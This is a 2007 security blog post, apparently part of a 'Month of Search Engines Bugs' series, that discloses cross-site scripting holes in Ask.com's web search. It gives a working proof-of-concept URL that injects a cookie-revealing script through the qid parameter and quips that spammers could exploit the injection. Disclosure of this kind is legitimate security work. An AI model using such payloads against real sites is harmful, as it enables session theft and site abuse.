« Добірка експлоітів
MOSEB-10 Bonus: Vulnerabilities at www.ask.com »

MOSEB-10: Vulnerabilities at www.ask.com

20:49 10.06.2007

Next participant of the project is Ask search engine. It is one of the popular search engines.

The vulnerabilities are in Ask web search. These Cross-Site Scripting holes I found 10.05.2007.

XSS:

The vulnerabilities are in qid and jss parameters:
http://www.ask.com/web?q=test&qid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Also page with html injection hole has PR5. So black seo guys will be happy.

Moral: searching in the web can be dangerous.

P.S.

I prepared others holes at Ask.com. So wait for today’s bonus post ;-) .


This entry was posted on 20:49 10.06.2007 and is filed under MOSEB. You can follow any responses to this entry through the RSS 2.0 feed.

Leave a Reply

:mrgreen: :| :twisted: :arrow: 8O :) :? 8) :evil: :D :idea: :oops: :P :roll: ;) :cry: :o :lol: :x :( :!: :?: